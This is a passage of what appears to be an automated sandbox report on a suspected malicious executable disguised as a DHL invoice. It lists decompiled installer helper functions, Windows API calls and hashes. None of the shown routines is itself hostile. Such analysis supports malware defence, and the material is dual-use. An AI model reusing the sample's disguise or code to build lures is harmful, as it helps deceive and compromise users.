                                        • CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,00421510,Error launching installer), ref: 004056A2
                                        • CloseHandle.KERNEL32(?), ref: 004056AF
                                        Strings
                                        • Error launching installer, xrefs: 0040568C
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.779143547.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.779109785.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.779195988.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.779221787.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.779221787.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.779221787.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.779221787.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.779221787.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.779221787.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.780430316.0000000000436000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.780430316.0000000000439000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_DHLINV000156.jbxd
                                        Similarity
                                        • API ID: CloseCreateHandleProcess
                                        • String ID: Error launching installer
                                        • API String ID: 3712363035-66219284
                                        • Opcode ID: 0a67d81f0dbc2c48957f366610cafbe47269508c26dde6c53db592e432081f5d
                                        • Instruction ID: 7ab3ce879d7da258620b5dd87dc6aa02706b67d8cc8a7f981bd8ed1ee31a9d30
                                        • Opcode Fuzzy Hash: 0a67d81f0dbc2c48957f366610cafbe47269508c26dde6c53db592e432081f5d
                                        • Instruction Fuzzy Hash: 46E046F0A00209BFEB009B60EC09F7B7AACEB10748F404861BD11F32A0E374A9108A79
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 100%
                                        			E00403762() {
                                        				void* _t2;
                                        				void* _t3;
                                        				void* _t6;
                                        				void* _t8;
                                        
                                        				_t8 =  *0x41eccc; // 0x508840
                                        				_t3 = E00403747(_t2, 0);
                                        				if(_t8 != 0) {
                                        					do {
                                        						_t6 = _t8;
                                        						_t8 =  *_t8;
                                        						FreeLibrary( *(_t6 + 8));
                                        						_t3 = GlobalFree(_t6);
                                        					} while (_t8 != 0);
                                        				}
                                        				 *0x41eccc =  *0x41eccc & 0x00000000;
                                        				return _t3;
                                        			}







                                        0x00403763
                                        0x0040376b
                                        0x00403772
                                        0x00403775
                                        0x00403775
                                        0x00403777
                                        0x0040377c
                                        0x00403783
                                        0x00403789
                                        0x0040378d
                                        0x0040378e
                                        0x00403796

                                        APIs
                                        • FreeLibrary.KERNEL32(?,74D0FA90,00000000,C:\Users\user\AppData\Local\Temp\,0040373A,00403554,?,?,00000006,00000008,0000000A), ref: 0040377C
                                        • GlobalFree.KERNEL32 ref: 00403783
                                        Strings
                                        • C:\Users\user\AppData\Local\Temp\, xrefs: 00403762
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.779143547.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.779109785.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.779195988.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.779221787.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.779221787.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.779221787.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.779221787.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.779221787.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.779221787.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.780430316.0000000000436000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.780430316.0000000000439000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_DHLINV000156.jbxd
                                        Similarity
                                        • API ID: Free$GlobalLibrary
                                        • String ID: C:\Users\user\AppData\Local\Temp\
                                        • API String ID: 1100898210-3916508600
                                        • Opcode ID: c8d1562c69e49bacb52193c1b129ec66577e910d0a26dd744afe86c7ae1d1dec
                                        • Instruction ID: ee514f1fc3f324b596d41214b75e1b85a5e4a54197580a2dff82031d974a72f0
                                        • Opcode Fuzzy Hash: c8d1562c69e49bacb52193c1b129ec66577e910d0a26dd744afe86c7ae1d1dec
                                        • Instruction Fuzzy Hash: 40E0C27380112097C7251F07EC04B5A776CAF45B22F01C02AEC007B3A0C7742C418BD9
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 100%
                                        			E004059B9(char* _a4) {
                                        				char* _t3;
                                        				char* _t5;
                                        
                                        				_t5 = _a4;
                                        				_t3 =  &(_t5[lstrlenA(_t5)]);
                                        				while( *_t3 != 0x5c) {
                                        					_t3 = CharPrevA(_t5, _t3);
                                        					if(_t3 > _t5) {
                                        						continue;
                                        					}
                                        					break;
                                        				}
                                        				 *_t3 =  *_t3 & 0x00000000;
                                        				return  &(_t3[1]);
                                        			}





                                        0x004059ba
                                        0x004059c4
                                        0x004059c6
                                        0x004059cd
                                        0x004059d5
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x004059d5
                                        0x004059d7
                                        0x004059dc

                                        APIs
                                        • lstrlenA.KERNEL32(80000000,C:\Users\user\Desktop,00402E30,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\DHLINV000156.exe,C:\Users\user\Desktop\DHLINV000156.exe,80000000,00000003), ref: 004059BF
                                        • CharPrevA.USER32(80000000,00000000,80000000,C:\Users\user\Desktop,00402E30,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\DHLINV000156.exe,C:\Users\user\Desktop\DHLINV000156.exe,80000000,00000003), ref: 004059CD
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.779143547.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.779109785.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.779195988.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.779221787.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.779221787.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.779221787.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.779221787.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.779221787.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.779221787.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.780430316.0000000000436000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.780430316.0000000000439000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_DHLINV000156.jbxd
                                        Similarity
                                        • API ID: CharPrevlstrlen
                                        • String ID: C:\Users\user\Desktop
                                        • API String ID: 2709904686-1669384263
                                        • Opcode ID: 1c4ce1fe46e37373cead662465a4f3eb2a6c0bdf31f922d28b251b51ad992424
                                        • Instruction ID: a086819795abd80aa1ad59fb022c9920fa60cb9da26d6d2253466900a8022463
                                        • Opcode Fuzzy Hash: 1c4ce1fe46e37373cead662465a4f3eb2a6c0bdf31f922d28b251b51ad992424
                                        • Instruction Fuzzy Hash: 3FD0A7E3408DB05EE70353149C04B9F6A48CF12310F0900A3F180A21A6C67C1C414BFE
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 100%
                                        			E73EF10E0(void* _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
                                        				char* _t17;
                                        				char _t19;
                                        				void* _t20;
                                        				void* _t24;
                                        				void* _t27;
                                        				void* _t31;
                                        				void* _t37;
                                        				void* _t39;
                                        				void* _t40;
                                        				signed int _t43;
                                        				void* _t52;
                                        				char* _t53;
                                        				char* _t55;
                                        				void* _t56;
                                        				void* _t58;
                                        
                                        				 *0x73ef405c = _a8;
                                        				 *0x73ef4060 = _a16;
                                        				 *0x73ef4064 = _a12;
                                        				 *((intOrPtr*)(_a20 + 0xc))( *0x73ef4038, E73EF1556, _t52);
                                        				_t43 =  *0x73ef405c +  *0x73ef405c * 4 << 2;
                                        				_t17 = E73EF123B();
                                        				_a8 = _t17;
                                        				_t53 = _t17;
                                        				if( *_t17 == 0) {
                                        					L16:
                                        					return GlobalFree(_a8);
                                        				} else {
                                        					do {
                                        						_t19 =  *_t53;
                                        						_t55 = _t53 + 1;
                                        						_t58 = _t19 - 0x6c;
                                        						if(_t58 > 0) {
                                        							_t20 = _t19 - 0x70;
                                        							if(_t20 == 0) {
                                        								L12:
                                        								_t53 = _t55 + 1;
                                        								_t24 = E73EF1266(E73EF12AD( *_t55 - 0x30));
                                        								L13:
                                        								GlobalFree(_t24);
                                        								goto L14;
                                        							}
                                        							_t27 = _t20;
                                        							if(_t27 == 0) {
                                        								L10:
                                        								_t53 = _t55 + 1;
                                        								_t24 = E73EF12D1( *_t55 - 0x30, E73EF123B());
                                        								goto L13;
                                        							}
                                        							L7:
                                        							if(_t27 == 1) {
                                        								_t31 = GlobalAlloc(0x40, _t43 + 4);
                                        								 *_t31 =  *0x73ef4030;
                                        								 *0x73ef4030 = _t31;
                                        								E73EF1508(_t31 + 4,  *0x73ef4064, _t43);
                                        								_t56 = _t56 + 0xc;
                                        							}
                                        							goto L14;
                                        						}
                                        						if(_t58 == 0) {
                                        							L17:
                                        							_t34 =  *0x73ef4030;
                                        							if( *0x73ef4030 != 0) {
                                        								E73EF1508( *0x73ef4064, _t34 + 4, _t43);
                                        								_t37 =  *0x73ef4030;
                                        								_t56 = _t56 + 0xc;
                                        								GlobalFree(_t37);
                                        								 *0x73ef4030 =  *_t37;
                                        							}
                                        							goto L14;
                                        						}
                                        						_t39 = _t19 - 0x4c;
                                        						if(_t39 == 0) {
                                        							goto L17;
                                        						}
                                        						_t40 = _t39 - 4;
                                        						if(_t40 == 0) {
                                        							 *_t55 =  *_t55 + 0xa;
                                        							goto L12;
                                        						}
                                        						_t27 = _t40;
                                        						if(_t27 == 0) {
                                        							 *_t55 =  *_t55 + 0xa;
                                        							goto L10;
                                        						}
                                        						goto L7;
                                        						L14:
                                        					} while ( *_t53 != 0);
                                        					goto L16;
                                        				}
                                        			}


















                                        0x73ef10e7
                                        0x73ef10ef
                                        0x73ef1103
                                        0x73ef110b
                                        0x73ef1116
                                        0x73ef1119
                                        0x73ef1121
                                        0x73ef1124
                                        0x73ef1126
                                        0x73ef11c4
                                        0x73ef11d0
                                        0x73ef112c
                                        0x73ef112d
                                        0x73ef112d
                                        0x73ef1130
                                        0x73ef1131
                                        0x73ef1134
                                        0x73ef1203
                                        0x73ef1206
                                        0x73ef119e
                                        0x73ef11a4
                                        0x73ef11ac
                                        0x73ef11b1
                                        0x73ef11b4
                                        0x00000000
                                        0x73ef11b4
                                        0x73ef1209
                                        0x73ef120a
                                        0x73ef1186
                                        0x73ef118c
                                        0x73ef1194
                                        0x00000000
                                        0x73ef1194
                                        0x73ef1152
                                        0x73ef1153
                                        0x73ef115b
                                        0x73ef1168
                                        0x73ef1170
                                        0x73ef1179
                                        0x73ef117e
                                        0x73ef117e
                                        0x00000000
                                        0x73ef1153
                                        0x73ef113a
                                        0x73ef11d1
                                        0x73ef11d1
                                        0x73ef11d8
                                        0x73ef11e5
                                        0x73ef11ea
                                        0x73ef11ef
                                        0x73ef11f5
                                        0x73ef11fb
                                        0x73ef11fb
                                        0x00000000
                                        0x73ef11d8
                                        0x73ef1140
                                        0x73ef1143
                                        0x00000000
                                        0x00000000
                                        0x73ef1149
                                        0x73ef114c
                                        0x73ef119b
                                        0x00000000
                                        0x73ef119b
                                        0x73ef114f
                                        0x73ef1150
                                        0x73ef1183
                                        0x00000000
                                        0x73ef1183
                                        0x00000000
                                        0x73ef11ba
                                        0x73ef11ba
                                        0x00000000
                                        0x73ef11c3

                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.789361572.0000000073EF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 73EF0000, based on PE: true
                                        • Associated: 00000000.00000002.789352592.0000000073EF0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000000.00000002.789369353.0000000073EF3000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000000.00000002.789378752.0000000073EF5000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_73ef0000_DHLINV000156.jbxd
                                        Similarity
                                        • API ID: Global$Free$Alloc
                                        • String ID:
                                        • API String ID: 1780285237-0
                                        • Opcode ID: 4f8f63f97b7d9dda36d3cfcfbf16577998e0cefd7a5d6bbce81fa146fb8ae841
                                        • Instruction ID: 3cdbca75830cbc370c11cc1cfe67bc99f1e4ddae930da7d8e24673dbe6bec23d
                                        • Opcode Fuzzy Hash: 4f8f63f97b7d9dda36d3cfcfbf16577998e0cefd7a5d6bbce81fa146fb8ae841
                                        • Instruction Fuzzy Hash: 7B31C4B650426BAFE781AFA6D944F2D7FFDEB85254B280115E84AC7250D7F0C800CF25
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 100%
                                        			E00405AD8(void* __ecx, CHAR* _a4, CHAR* _a8) {
                                        				int _v8;
                                        				int _t12;
                                        				int _t14;
                                        				int _t15;
                                        				CHAR* _t17;
                                        				CHAR* _t27;
                                        
                                        				_t12 = lstrlenA(_a8);
                                        				_t27 = _a4;
                                        				_v8 = _t12;
                                        				while(lstrlenA(_t27) >= _v8) {
                                        					_t14 = _v8;
                                        					 *(_t14 + _t27) =  *(_t14 + _t27) & 0x00000000;
                                        					_t15 = lstrcmpiA(_t27, _a8);
                                        					_t27[_v8] =  *(_t14 + _t27);
                                        					if(_t15 == 0) {
                                        						_t17 = _t27;
                                        					} else {
                                        						_t27 = CharNextA(_t27);
                                        						continue;
                                        					}
                                        					L5:
                                        					return _t17;
                                        				}
                                        				_t17 = 0;
                                        				goto L5;
                                        			}









                                        0x00405ae8
                                        0x00405aea
                                        0x00405aed
                                        0x00405b19
                                        0x00405af2
                                        0x00405afb
                                        0x00405b00
                                        0x00405b0b
                                        0x00405b0e
                                        0x00405b2a
                                        0x00405b10
                                        0x00405b17
                                        0x00000000
                                        0x00405b17
                                        0x00405b23
                                        0x00405b27
                                        0x00405b27
                                        0x00405b21
                                        0x00000000

                                        APIs
                                        • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405D33,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405AE8
                                        • lstrcmpiA.KERNEL32(00000000,00000000,?,00000000,00405D33,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405B00
                                        • CharNextA.USER32(00000000,?,00000000,00405D33,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405B11
                                        • lstrlenA.KERNEL32(00000000,?,00000000,00405D33,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405B1A
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.779143547.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.779109785.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.779195988.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.779221787.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.779221787.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.779221787.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.779221787.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.779221787.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.779221787.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.780430316.0000000000436000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.780430316.0000000000439000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_DHLINV000156.jbxd
                                        Similarity
                                        • API ID: lstrlen$CharNextlstrcmpi
                                        • String ID:
                                        • API String ID: 190613189-0
                                        • Opcode ID: c17fcd1cf7dd52c707961598001fbe9307a221727c523cbd792ccb3aa3d95fe1
                                        • Instruction ID: 2cbfd0870324320007afb9b70b5ca04d8eb3af27e3ea935175830c0dc6d3898b
                                        • Opcode Fuzzy Hash: c17fcd1cf7dd52c707961598001fbe9307a221727c523cbd792ccb3aa3d95fe1
                                        • Instruction Fuzzy Hash: 50F0C231604414BFC702DBA9DC40D9EBBB8EF46250B2540A6E800F7251D274FE01ABA9
                                        Uniqueness

                                        Uniqueness Score: -1.00%